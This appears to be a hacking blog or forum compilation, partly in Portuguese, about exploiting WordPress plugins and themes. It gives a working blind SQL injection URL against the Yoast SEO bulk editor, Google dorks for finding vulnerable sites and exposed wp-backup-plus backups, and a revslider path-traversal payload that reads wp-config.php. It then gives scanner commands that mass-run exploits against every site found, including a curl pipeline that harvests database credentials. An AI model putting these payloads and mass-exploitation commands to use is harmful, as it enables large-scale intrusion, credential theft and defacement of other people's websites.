A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc


DORK: inurl:admin.php?page=wpseo_bulk

Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.

Otimização:
FULL: http://pastebin.com/gi1Q4NmQ

EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

wp-backup-plus: Wordpress Database File Download filter with inurlbr

Wordpress File Download Database 

The WP Backup Plus Plugin:
The Full Automated Wordpress Backup Plugin that sends your backup to multiple locations that allows you to backup, restore, automate, and clone.

DORK: index of "wp-backup-plus"

(Priv8) method for using the downloaded file to deface the server and how to find the script file download in WordPress sites can be explored in all wordpress versions.

[TUTORIAL]

Using inurlbr scanner to filter

COMMAND INURLBR:
php inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

[RESULT SHORT]

DOWNLOAD THE TOOL INURLBR: 
https://github.com/googleinurl/SCANNER-INURLBR

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142

-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144

-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand

--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'

 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'

    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR

[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution

[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo